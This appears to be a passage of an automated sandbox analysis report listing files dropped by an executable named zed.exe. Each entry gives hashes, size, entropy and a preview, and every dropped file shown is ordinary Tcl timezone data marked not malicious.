                                                                                                                                                                                                                                            SHA-256:C445B8030DEDDDED0AFF5CC692CC323B63BE8C14BBD42DC3FDE90AD4F9D14785
                                                                                                                                                                                                                                            SHA-512:A32C477B6FAA79247907D1C4E2DF400B05AF4B529277C4CE12B33097872311E3F579115DC8CBA93DAC936928FD574414F3473A9CB7C8E85AB57CCA57489B60F8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Urumqi) {.. {-9223372036854775808 21020 0 LMT}.. {-1325483420 21600 0 +06}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2058
                                                                                                                                                                                                                                            Entropy (8bit):3.773734429231407
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5petrlfgLv+OC+jsuwltZQONEa2Ggf3augO8UoxLyHdX/CX6bW4Bv/7NKxKG:5Ysv+0j6lua2Gg/3gO8UoOZU2Wc/pKF
                                                                                                                                                                                                                                            MD5:5ADD78E4AFCBA913D078A8790861A2DE
                                                                                                                                                                                                                                            SHA1:BB63A762D5D76C0FD3CB9AB2BCDE95718E1C99EB
                                                                                                                                                                                                                                            SHA-256:9D639C0FC69B3BEEBC96969092F9590EB48E7946E901B225BF245E165973B9A8
                                                                                                                                                                                                                                            SHA-512:7C2418FD1F96F101B83E2ABDF2551405C6E429DBBF30A2FA7CD2477E2CE1CEEBB790C51B28AEFF043BA7A7A914CEF3C812668058D69225B9FE9475C56508453D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Ust-Nera) {.. {-9223372036854775808 34374 0 LMT}.. {-1579426374 28800 0 +08}.. {354898800 43200 0 +12}.. {370699200 39600 0 +11}.. {386427600 43200 1 +12}.. {402235200 39600 0 +11}.. {417963600 43200 1 +12}.. {433771200 39600 0 +11}.. {449586000 43200 1 +12}.. {465318000 39600 0 +11}.. {481042800 43200 1 +12}.. {496767600 39600 0 +11}.. {512492400 43200 1 +12}.. {528217200 39600 0 +11}.. {543942000 43200 1 +12}.. {559666800 39600 0 +11}.. {575391600 43200 1 +12}.. {591116400 39600 0 +11}.. {606841200 43200 1 +12}.. {622566000 39600 0 +11}.. {638290800 43200 1 +12}.. {654620400 39600 0 +11}.. {670345200 36000 0 +11}.. {670348800 39600 1 +11}.. {686073600 36000 0 +10}.. {695750400 39600 0 +12}.. {701794800 43200 1 +12}.. {717519600 39600 0 +11}.. {733244400 43200 1 +12}.. {748969200 39600 0 +11}.. {764694000 43200 1 +12}.. {780418
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                                                            Entropy (8bit):4.858039387006872
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8VLYO5YFfXHAIgN8ELYOJARL/2WFKgTjEHp4WFKELt:SlSWB9vsM3y1LePHAIgKELtAN/2wKgsX
                                                                                                                                                                                                                                            MD5:D23A09C84A5368FBB47174BC0A460D14
                                                                                                                                                                                                                                            SHA1:045A72FEA79C75E5F0029BD110E33A022C57DFAB
                                                                                                                                                                                                                                            SHA-256:18F5E4FE8247F676278AC5F1912AC401DC48DF5B756D22E76FF1CFA702F88DA7
                                                                                                                                                                                                                                            SHA-512:404EABC2FC162E18C678CED063249C7FF4C28653880EA1903CE846FD191CD1C5B61E0610736F250B79BBAC768B1AFD6B9A8824D56D74591A95D7301B47D48387
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Bangkok)]} {.. LoadTimeZoneFile Asia/Bangkok..}..set TZData(:Asia/Vientiane) $TZData(:Asia/Bangkok)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2062
                                                                                                                                                                                                                                            Entropy (8bit):3.7094518963173035
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:56beOUYQ7FyDy3le3i96VwAmnuBNuTw6vl9O8nfipRkwhUZDAcD:56cYQBIy343dVNUIukElcXRDhUBAcD
                                                                                                                                                                                                                                            MD5:5C0C094B088D0212182E7B944197D4FE
                                                                                                                                                                                                                                            SHA1:CF43A511FE9CD295207DF350704462E09D4D5278
                                                                                                                                                                                                                                            SHA-256:2558C96E25359C72F168DAC6FB3C16C54F8FD7D0724EEB1671156D4A1F42AC6C
                                                                                                                                                                                                                                            SHA-512:5D659EBDC8C2B06C964B083ECC78B4370A4658590D83F020CD23910C44E2D8DAFE69F61E8EB569E1905E89F38CD03ABE6B92F6CE36CF0B1EE0732A7645AFA65D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Vladivostok) {.. {-9223372036854775808 31651 0 LMT}.. {-1487321251 32400 0 +09}.. {-1247562000 36000 0 +11}.. {354895200 39600 1 +11}.. {370702800 36000 0 +10}.. {386431200 39600 1 +11}.. {402238800 36000 0 +10}.. {417967200 39600 1 +11}.. {433774800 36000 0 +10}.. {449589600 39600 1 +11}.. {465321600 36000 0 +10}.. {481046400 39600 1 +11}.. {496771200 36000 0 +10}.. {512496000 39600 1 +11}.. {528220800 36000 0 +10}.. {543945600 39600 1 +11}.. {559670400 36000 0 +10}.. {575395200 39600 1 +11}.. {591120000 36000 0 +10}.. {606844800 39600 1 +11}.. {622569600 36000 0 +10}.. {638294400 39600 1 +11}.. {654624000 36000 0 +10}.. {670348800 32400 0 +10}.. {670352400 36000 1 +10}.. {686077200 32400 0 +09}.. {695754000 36000 0 +11}.. {701798400 39600 1 +11}.. {717523200 36000 0 +10}.. {733248000 39600 1 +11}.. {748972800 36000 0 +10}.. {7
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2058
                                                                                                                                                                                                                                            Entropy (8bit):3.7081033128260934
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5h+r1gIgWH/lt0irzEzCSCItWiIrW+rDQk9CVhyFY7rRWjYuhUmgr2j:K5PhtjLiII2ZFlgm
                                                                                                                                                                                                                                            MD5:E43E5F0EA7C4575525BAB130984DCDCC
                                                                                                                                                                                                                                            SHA1:2D715749469FEA51A8E25D1F4F8DC4FF9178817D
                                                                                                                                                                                                                                            SHA-256:3BEF13638C46F16435D326C675907E61BB68C8173153CED3359E983BE0E413E5
                                                                                                                                                                                                                                            SHA-512:27954FEC865031BC363CFDE94E97B3B19836A6F777646EA4AAB12ECCAEE6D60A0C690711EA192B917AC717F94A01D1EF64BAE97DF968069CC12415971B070498
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yakutsk) {.. {-9223372036854775808 31138 0 LMT}.. {-1579423138 28800 0 +08}.. {-1247558400 32400 0 +10}.. {354898800 36000 1 +10}.. {370706400 32400 0 +09}.. {386434800 36000 1 +10}.. {402242400 32400 0 +09}.. {417970800 36000 1 +10}.. {433778400 32400 0 +09}.. {449593200 36000 1 +10}.. {465325200 32400 0 +09}.. {481050000 36000 1 +10}.. {496774800 32400 0 +09}.. {512499600 36000 1 +10}.. {528224400 32400 0 +09}.. {543949200 36000 1 +10}.. {559674000 32400 0 +09}.. {575398800 36000 1 +10}.. {591123600 32400 0 +09}.. {606848400 36000 1 +10}.. {622573200 32400 0 +09}.. {638298000 36000 1 +10}.. {654627600 32400 0 +09}.. {670352400 28800 0 +09}.. {670356000 32400 1 +09}.. {686080800 28800 0 +08}.. {695757600 32400 0 +10}.. {701802000 36000 1 +10}.. {717526800 32400 0 +09}.. {733251600 36000 1 +10}.. {748976400 32400 0 +09}.. {76470
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):244
                                                                                                                                                                                                                                            Entropy (8bit):4.692243303623333
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wKs5XDm2OHGVQoHvZN6FCDx+UIFDVkvScHbY/s5UIAy:MB862KTmdHGuCvZNNkkHH3Sy
                                                                                                                                                                                                                                            MD5:D45766D30074719C9A88ACE8BB53204B
                                                                                                                                                                                                                                            SHA1:69B333DFCCCCEB66DD0F7DC28B272BB10769B6B0
                                                                                                                                                                                                                                            SHA-256:2526557810747E78E713AE09BC305621A80FAEECF8D441632E7825738D4C79CB
                                                                                                                                                                                                                                            SHA-512:5255DEED72D7D13862A4D6BED7E0458C099D2EF5A1B41536CAA7C0E65A61DE8B8D1AD62AD44559F970B6613ADFB3862778D1CC99B9A05CB5BBCA7F0202B5A5B2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yangon) {.. {-9223372036854775808 23087 0 LMT}.. {-2840163887 23087 0 RMT}.. {-1577946287 23400 0 +0630}.. {-873268200 32400 0 +09}.. {-778410000 23400 0 +0630}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2095
                                                                                                                                                                                                                                            Entropy (8bit):3.704641905144701
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5ievNhYvm1qv7vXIovPvSvlDvtvuovKKvKcNvHvAvivBvqvvEyv8vlvEv+v4v+v+:/Nupj40H6l75FKCKcZP8qdyEaoBAWkW+
                                                                                                                                                                                                                                            MD5:D4DABA407BB8A10E4961D1DE5D9781D1
                                                                                                                                                                                                                                            SHA1:6933DE65336331BD90E2BEC6AEA0609B16DAEDC9
                                                                                                                                                                                                                                            SHA-256:2C78699EFC60758B8F8D0D1DEEDFDED5E65C65EBF3082B23E60BDEA8BF8FBCFE
                                                                                                                                                                                                                                            SHA-512:459E2187FAA66414F5CE934C335F563DFD2FA5316B86A54D1A29123A0460AFD65B7CE46629BD6A070A14CB6873A28A2F2803DE5FF4F29EA610712EB07FAD303F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yekaterinburg) {.. {-9223372036854775808 14553 0 LMT}.. {-1688270553 13505 0 PMT}.. {-1592610305 14400 0 +04}.. {-1247544000 18000 0 +06}.. {354913200 21600 1 +06}.. {370720800 18000 0 +05}.. {386449200 21600 1 +06}.. {402256800 18000 0 +05}.. {417985200 21600 1 +06}.. {433792800 18000 0 +05}.. {449607600 21600 1 +06}.. {465339600 18000 0 +05}.. {481064400 21600 1 +06}.. {496789200 18000 0 +05}.. {512514000 21600 1 +06}.. {528238800 18000 0 +05}.. {543963600 21600 1 +06}.. {559688400 18000 0 +05}.. {575413200 21600 1 +06}.. {591138000 18000 0 +05}.. {606862800 21600 1 +06}.. {622587600 18000 0 +05}.. {638312400 21600 1 +06}.. {654642000 18000 0 +05}.. {670366800 14400 0 +05}.. {670370400 18000 1 +05}.. {686095200 14400 0 +04}.. {695772000 18000 0 +06}.. {701816400 21600 1 +06}.. {717541200 18000 0 +05}.. {733266000 21600 1 +06}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2029
                                                                                                                                                                                                                                            Entropy (8bit):3.6487650030366106
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5O4GeuadYlykbocXcwJUE5iu8JmFebARoc9lVNk7/9bq8dq16b3C9UPBUUUl2ue/:5xKdsUf8mFpNWFnyLCPYmPJSi3sh4
                                                                                                                                                                                                                                            MD5:2CFA7C55D0731D24679CA5D5DC716381
                                                                                                                                                                                                                                            SHA1:2BB66783D75C71E76409365757980FBC15F53231
                                                                                                                                                                                                                                            SHA-256:20871FA6AA959DDFB73D846271B4A568627B564CFC08A11BDD84B98C2F2019A3
                                                                                                                                                                                                                                            SHA-512:CAB10A48859B2C0B2CC7C56E0AA530AE7E506A4986BADC5ED974D124BD46DB328B50C423F83FCFD52D31962A249EEFC10351798B86D51EDA500F412C8D42E6BC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yerevan) {.. {-9223372036854775808 10680 0 LMT}.. {-1441162680 10800 0 +03}.. {-405140400 14400 0 +04}.. {354916800 18000 1 +04}.. {370724400 14400 0 +04}.. {386452800 18000 1 +04}.. {402260400 14400 0 +04}.. {417988800 18000 1 +04}.. {433796400 14400 0 +04}.. {449611200 18000 1 +04}.. {465343200 14400 0 +04}.. {481068000 18000 1 +04}.. {496792800 14400 0 +04}.. {512517600 18000 1 +04}.. {528242400 14400 0 +04}.. {543967200 18000 1 +04}.. {559692000 14400 0 +04}.. {575416800 18000 1 +04}.. {591141600 14400 0 +04}.. {606866400 18000 1 +04}.. {622591200 14400 0 +04}.. {638316000 18000 1 +04}.. {654645600 14400 0 +04}.. {670370400 10800 0 +03}.. {670374000 14400 1 +03}.. {686098800 10800 0 +03}.. {701823600 14400 1 +03}.. {717548400 10800 0 +03}.. {733273200 14400 1 +03}.. {748998000 10800 0 +03}.. {764722800 14400 1 +03}.. {780447
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9879
                                                                                                                                                                                                                                            Entropy (8bit):3.557602151081988
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:K35nZPOUYySoluItljncxelTMwtrayE6x5sETNek/CyNzybxYKmX6SXL/XbEcygI:K940pb6cL/b3Ldr9Q7TMq+ML
                                                                                                                                                                                                                                            MD5:E7F2A3EE0362E9ED3ECBAD24168AD098
                                                                                                                                                                                                                                            SHA1:98832274F6D9B641B809123D1272A1C04EEAA177
                                                                                                                                                                                                                                            SHA-256:6B3609BE4E93D21A2AB492594EDD387931E2C787E8471C9F2D3A677F34002D8F
                                                                                                                                                                                                                                            SHA-512:C48A76F8251AE455C759CB98802E40B3BEF716FD8E7441B6DE0242942C913367E3572B7C871082E97CA9BE67EC7DC37F8D01C438965217AC0EC36AD508DCE0D4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Azores) {.. {-9223372036854775808 -6160 0 LMT}.. {-2713904240 -6872 0 HMT}.. {-1830376800 -7200 0 -02}.. {-1689548400 -3600 1 -01}.. {-1677794400 -7200 0 -02}.. {-1667430000 -3600 1 -01}.. {-1647730800 -7200 0 -02}.. {-1635807600 -3600 1 -01}.. {-1616194800 -7200 0 -02}.. {-1604358000 -3600 1 -01}.. {-1584658800 -7200 0 -02}.. {-1572735600 -3600 1 -01}.. {-1553036400 -7200 0 -02}.. {-1541199600 -3600 1 -01}.. {-1521500400 -7200 0 -02}.. {-1442444400 -3600 1 -01}.. {-1426806000 -7200 0 -02}.. {-1379286000 -3600 1 -01}.. {-1364770800 -7200 0 -02}.. {-1348441200 -3600 1 -01}.. {-1333321200 -7200 0 -02}.. {-1316386800 -3600 1 -01}.. {-1301266800 -7200 0 -02}.. {-1284332400 -3600 1 -01}.. {-1269817200 -7200 0 -02}.. {-1221433200 -3600 1 -01}.. {-1206918000 -7200 0 -02}.. {-1191193200 -3600 1 -01}.. {-1175468400 -7200 0 -02}.. {-1127689
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8784
                                                                                                                                                                                                                                            Entropy (8bit):3.833553120942514
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:ZRBHksL3zq6bCvyjvspNWMPm4bPJWXtRbALtuFW4ng2CEBJuQaeEy9P19OBYEi/+:ft0CC
                                                                                                                                                                                                                                            MD5:B04E22B9B42722013941169B5D04DEA2
                                                                                                                                                                                                                                            SHA1:32B96A7D9504D5022A6C4E2D310E95B5F062947F
                                                                                                                                                                                                                                            SHA-256:099C3BEFBA3B4C00AE19BC53D475A52B32FAC9B36EC823C8EAEFC7D00F78F388
                                                                                                                                                                                                                                            SHA-512:8B93BCA1E923B7A43F2EB0889216E8FF991D13CB8D25BD300310ED7CD8537DBD858E8F422C9B52AE2F52F7C1CB450EF0B7C5C1B3AE547C9C1E18E2A851569DD5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Bermuda) {.. {-9223372036854775808 -15558 0 LMT}.. {-2524506042 -15558 0 BMT}.. {-1664307642 -11958 1 BMT}.. {-1648932042 -15558 0 BMT}.. {-1632080442 -11958 1 BMT}.. {-1618692042 -15558 0 BST}.. {-1262281242 -14400 0 AT}.. {-882727200 -10800 1 ADT}.. {-858538800 -14400 0 AST}.. {-845229600 -10800 1 ADT}.. {-825879600 -14400 0 AST}.. {-814384800 -10800 1 ADT}.. {-793825200 -14400 0 AST}.. {-782935200 -10800 1 ADT}.. {-762375600 -14400 0 AST}.. {-713988000 -10800 1 ADT}.. {-703710000 -14400 0 AST}.. {-681933600 -10800 1 ADT}.. {-672865200 -14400 0 AST}.. {-650484000 -10800 1 ADT}.. {-641415600 -14400 0 AST}.. {-618429600 -10800 1 ADT}.. {-609966000 -14400 0 AST}.. {-586980000 -10800 1 ADT}.. {-578516400 -14400 0 AST}.. {-555530400 -10800 1 ADT}.. {-546462000 -14400 0 AST}.. {-429127200 -10800 1 ADT}.. {-415825200 -14400 0 AST}.. {1
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6856
                                                                                                                                                                                                                                            Entropy (8bit):3.8064107143060752
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:KXVuHfXCiZoFtFPIaFF1w0urfva946ZGsE3f2Sf+aCNmSv+kznl4klEp8OT:KXVQbkIaFF1w0us4qE3+sSGjT
                                                                                                                                                                                                                                            MD5:8ABD279386C50705C074EEE18BF5AE59
                                                                                                                                                                                                                                            SHA1:C392231DBE744F5942DA4BFAC8AD0ABEBAEA0BF3
                                                                                                                                                                                                                                            SHA-256:2026944DCDEBC52F64405E35119F4CF97EA9AA1E769498730880B03F29A2B885
                                                                                                                                                                                                                                            SHA-512:3095759D01AC7EEA25E427CA38E8A0395BEFA7250E7A0C1327BF9D61F07F4570CDF7313FBE6695973EB0DD66D201C6C63591CC0DA8A1E0029926DC7056F4C95B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Canary) {.. {-9223372036854775808 -3696 0 LMT}.. {-1509663504 -3600 0 -01}.. {-733874400 0 0 WET}.. {323827200 3600 1 WEST}.. {338950800 0 0 WET}.. {354675600 3600 1 WEST}.. {370400400 0 0 WET}.. {386125200 3600 1 WEST}.. {401850000 0 0 WET}.. {417574800 3600 1 WEST}.. {433299600 0 0 WET}.. {449024400 3600 1 WEST}.. {465354000 0 0 WET}.. {481078800 3600 1 WEST}.. {496803600 0 0 WET}.. {512528400 3600 1 WEST}.. {528253200 0 0 WET}.. {543978000 3600 1 WEST}.. {559702800 0 0 WET}.. {575427600 3600 1 WEST}.. {591152400 0 0 WET}.. {606877200 3600 1 WEST}.. {622602000 0 0 WET}.. {638326800 3600 1 WEST}.. {654656400 0 0 WET}.. {670381200 3600 1 WEST}.. {686106000 0 0 WET}.. {701830800 3600 1 WEST}.. {717555600 0 0 WET}.. {733280400 3600 1 WEST}.. {749005200 0 0 WET}.. {764730000 3600 1 WEST}.. {780454800 0 0 WET}.. {796179600
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):246
                                                                                                                                                                                                                                            Entropy (8bit):4.637993677747699
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2RQ7RfDm2OHDoH1JlvQV/FFrR3FcykVvQV/FFf+nmwV:MB86267RLmdHDC1w/FH3FcyL/FomwV
                                                                                                                                                                                                                                            MD5:1581C6470850E0C9DB204975488B1AF8
                                                                                                                                                                                                                                            SHA1:6933ED13F18AD785CEDF0837F86EFAC671297A85
                                                                                                                                                                                                                                            SHA-256:2EA59ACDB5BBDD3C6ABCEEA456838A5CA57371A3D2BB93604B37F998ED8B9D4D
                                                                                                                                                                                                                                            SHA-512:9FFFA013D82CEFF6F447521C19270ECDD71152F23670164423E6013FEC46253C62D2CB79B42630BD786BD113F27369E746CA981DD17E789F7571F473B47247C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Cape_Verde) {.. {-9223372036854775808 -5644 0 LMT}.. {-1830376800 -7200 0 -02}.. {-862610400 -3600 1 -01}.. {-764118000 -7200 0 -02}.. {186120000 -3600 0 -01}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):186
                                                                                                                                                                                                                                            Entropy (8bit):4.709193799640151
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqLG4E23vXHAIgvMG4EeRRL/2RQqG4EZrB/4RQqG4E1n:SlSWB9vsM3yCPHAIgvoRN/2RQ1rB/4Ri
                                                                                                                                                                                                                                            MD5:601EB889A87F9CAD6F1DF4D1AB009FAE
                                                                                                                                                                                                                                            SHA1:EB43C253A48755442A67A2408D7E3295549F831C
                                                                                                                                                                                                                                            SHA-256:64FB8CAD17CD36666C7027AAD01344FEF659B13699EEF1942365842F8ED2170E
                                                                                                                                                                                                                                            SHA-512:9CFC4A446ED6A3BEF6C26AE57324F10A970EE2ADD6933130447FAD6A3DB538841F2490DD461AF5776FACD9BD2CDC4A83247DFA6B34802AE844DDC6D4C37B28EA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Atlantic/Faroe)]} {.. LoadTimeZoneFile Atlantic/Faroe..}..set TZData(:Atlantic/Faeroe) $TZData(:Atlantic/Faroe)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6796
                                                                                                                                                                                                                                            Entropy (8bit):3.804838552487436
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:96ufXCiZoFtFPIaFF1w0urfva946ZGsE3f2Sf+aCNmSv+kznl4klEp8OT:/bkIaFF1w0us4qE3+sSGjT
                                                                                                                                                                                                                                            MD5:F97CC7EB9C52D00177BFF4715832FCD5
                                                                                                                                                                                                                                            SHA1:CD9DCBB5E6ADD6EA91C8F142957EC229FC7F6DA3
                                                                                                                                                                                                                                            SHA-256:795F438E7F01342D5F25ECCDD09FCE65C03C5D2D561B9B5191301D57EC16B850
                                                                                                                                                                                                                                            SHA-512:9586289FEB6C597160011A47432F0AC40000483FA2E579BD89046EFD33E98DDAD652B792FD80CEDEB4CD87B6439A7B473F25F1B7375BC75353CBAF9F77E1084E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Faroe) {.. {-9223372036854775808 -1624 0 LMT}.. {-1955748776 0 0 WET}.. {347155200 0 0 WET}.. {354675600 3600 1 WEST}.. {370400400 0 0 WET}.. {386125200 3600 1 WEST}.. {401850000 0 0 WET}.. {417574800 3600 1 WEST}.. {433299600 0 0 WET}.. {449024400 3600 1 WEST}.. {465354000 0 0 WET}.. {481078800 3600 1 WEST}.. {496803600 0 0 WET}.. {512528400 3600 1 WEST}.. {528253200 0 0 WET}.. {543978000 3600 1 WEST}.. {559702800 0 0 WET}.. {575427600 3600 1 WEST}.. {591152400 0 0 WET}.. {606877200 3600 1 WEST}.. {622602000 0 0 WET}.. {638326800 3600 1 WEST}.. {654656400 0 0 WET}.. {670381200 3600 1 WEST}.. {686106000 0 0 WET}.. {701830800 3600 1 WEST}.. {717555600 0 0 WET}.. {733280400 3600 1 WEST}.. {749005200 0 0 WET}.. {764730000 3600 1 WEST}.. {780454800 0 0 WET}.. {796179600 3600 1 WEST}.. {811904400 0 0 WET}.. {828234000 3600
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):186
                                                                                                                                                                                                                                            Entropy (8bit):4.957633978425468
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/2RQqG0EHEcAg/h8QahV:SlSWB9vsM3ymhVoPHAIgoh6N/2RQaK85
                                                                                                                                                                                                                                            MD5:95C2D55CCE5809089CDB041EA3D464F8
                                                                                                                                                                                                                                            SHA1:B395F5F26CE979BDF2B9E2CB51C06929AED11A6C
                                                                                                                                                                                                                                            SHA-256:11BF0746F95BA01807D3B34C8FAE3FF4AE9DB5E4E6BC0CB8B36906CC3F44EDE5
                                                                                                                                                                                                                                            SHA-512:AB2BE22E95A7C36E18EBA1BB63B3930A523ED793E43A3F597A8F63AE2F0E44436C39144BC136E7E5716D7FCBFAE7F1FAF36BCFFCF9C8D51151FF25BB14D6F8B5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Atlantic/Jan_Mayen) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9709
                                                                                                                                                                                                                                            Entropy (8bit):3.80455694200614
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:hZUiLbMsf/ss0qKd+aKyUXtOZHY1SCOcesoQivoKbFVCdm1rXWNXyCXTOuUbkIaq:hZZDQX1rWJysukysLE3+sSGjT
                                                                                                                                                                                                                                            MD5:AC6647F9B53B5958214EC3F3B78A4D85
                                                                                                                                                                                                                                            SHA1:7355622AF99296F069F73899D5C70941C207F676
                                                                                                                                                                                                                                            SHA-256:B2A0D0DDC26806A05B2BE806CA3F938DB12A3FA40110B8B21FD3F04EFED3A531
                                                                                                                                                                                                                                            SHA-512:07569CA4D5DC6D57D91D6FDC370671A7546B73BA653D094E1B501D33570F7700727AD7FF2A083BC79E9EDE807C47E7A5604BEF5803F290B2F277C51DEF10FA6B
                                                                                                                                                                                                                                            Malicious:false
